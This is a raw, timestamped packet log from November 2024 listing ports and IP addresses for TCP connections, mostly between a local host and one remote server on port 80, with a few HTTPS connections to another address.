                                                                                                                                                                        Nov 21, 2024 10:37:45.713329077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.713480949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.713522911 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.715171099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.715336084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.715399027 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.717072010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.717153072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.717200041 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.718938112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.719041109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.719098091 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.720750093 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.720807076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.720851898 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.722604036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.722753048 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.722801924 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.724391937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.724481106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.724531889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.726190090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.726284981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.726334095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.727953911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.728135109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.728255033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.729629040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.729780912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.729823112 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.731266975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.731362104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.731415987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.732929945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.733057022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.733158112 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.734587908 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.734714031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.734760046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.736233950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.736354113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.736396074 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.737833023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.738023996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.738075018 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.739445925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.739559889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.739607096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.741086960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.741153955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.741202116 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.742700100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.742789030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.742832899 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.744380951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.744472027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.744510889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.745784998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.745860100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.745902061 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.747375011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.747446060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.747484922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.748900890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.749032974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.749073982 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.750463963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.750623941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.750679016 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.752007008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.752171040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.752219915 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.753586054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.753828049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.753869057 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.755105972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.755223036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.755263090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.756095886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.756263971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.756304979 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.757046938 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.757164001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.757206917 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.757997036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.758128881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.758181095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.758982897 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.759118080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.759162903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.759952068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.760144949 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.760194063 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.760931969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.761058092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.761106968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.761924028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.762073994 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.762118101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.762870073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.763061047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.763103962 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.763839006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.763948917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.763991117 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.764823914 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.764868021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.764904022 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.765814066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.765960932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.766005993 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.766730070 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.766839981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.766885996 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.767698050 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.767807961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.767853975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.768687010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.768825054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.768872976 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.769615889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.769721985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.769768000 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.770596027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.770710945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.770759106 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.771591902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.771672964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.771725893 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.772547960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.772660971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.772701979 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.773502111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.773612976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.773655891 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.774488926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.774570942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.774614096 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.775473118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.775633097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.775676012 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.808964014 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.809039116 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.809118032 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.809324026 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.809348106 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.809357882 CET49788443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.809364080 CET4434978813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.812532902 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.812576056 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.812673092 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.812849045 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:45.812860966 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.908834934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.908953905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.909003973 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.909377098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.909589052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.909667969 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.910259962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.910387039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.910434961 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.911098957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.911227942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.911278009 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.912024975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.912184000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.912235022 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.912933111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.913037062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.913084030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.913849115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.914030075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.914073944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.914755106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.914829969 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.914933920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.915733099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.915793896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.915849924 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.916620970 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.916738987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.916779995 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.917509079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.917623043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.917671919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.918477058 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.918597937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.918656111 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.919361115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.919471979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.919522047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.920273066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.920413017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.920490980 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.921204090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.921289921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.921338081 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.922148943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.922245026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.922283888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.923028946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.923152924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.923196077 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.923966885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.924079895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.924129963 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.924911976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.925015926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.925071955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.925813913 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.925833941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.925883055 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.926745892 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.926907063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.926990032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.927634954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.927768946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.927812099 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.928637028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.928656101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.928689957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.929485083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.929763079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.929807901 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.930428028 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.930535078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.930581093 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.931338072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.931602001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.931646109 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.932259083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.932332039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.932375908 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.933178902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.933267117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.933311939 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.934137106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.934284925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.934328079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.935126066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.935331106 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.935374975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.935961962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.936111927 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.936170101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.936914921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.937061071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.937103987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.937808990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.937921047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.937961102 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.938707113 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.938832045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.938882113 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.939646006 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.939831972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.939878941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.940658092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.940792084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.940843105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.941529036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.941605091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.941643953 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.942423105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.942502975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.942548990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.943378925 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.943439960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.943484068 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.944271088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.944319963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.944365025 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.945171118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.945274115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.945319891 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.946099997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.946427107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.946471930 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.947005033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.947081089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.947124004 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.947905064 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.948040962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.948097944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.948847055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.948945999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.948987961 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.949755907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.949832916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.949909925 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.950707912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.950858116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.950903893 CET4978780192.168.2.6185.215.113.16
